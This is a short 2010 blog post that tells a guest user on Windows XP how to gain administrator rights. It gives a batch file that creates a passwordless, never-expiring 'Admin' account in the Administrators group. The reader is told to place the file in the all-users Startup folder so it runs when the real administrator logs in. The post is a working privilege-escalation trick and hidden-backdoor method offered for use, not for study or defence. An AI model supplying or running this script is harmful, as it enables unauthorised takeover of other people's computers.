FileServe

Thursday, December 2, 2010

Create a Admin Account if you are a Guest in Xp

@echo off
net user Admin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Admin

now copy this to notepad and save as admin.bat

copy the file to the startup folder.
here is the path of startup folder.

C:Documents and Settings >All Users>Start Menu>Programs>Startup

when the admin logs on the batch file runs and the admin acc is created…

so nxt time u log on u can use the username:admin
password:no







By:Anjo

1 comment: